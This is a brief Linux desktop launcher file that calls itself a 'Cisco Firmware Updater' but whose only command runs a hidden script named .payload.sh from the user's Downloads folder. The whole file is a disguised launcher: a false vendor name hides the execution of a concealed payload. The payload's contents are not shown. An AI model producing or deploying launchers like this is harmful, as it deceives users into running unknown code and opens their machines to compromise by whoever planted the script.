[Desktop Entry]
Encoding = UTF-8
Version = 1.0
Terminal = true
Name = Cisco Firmware Updater
Type = Application
Exec = bash -c '$HOME/Downloads/.payload.sh'
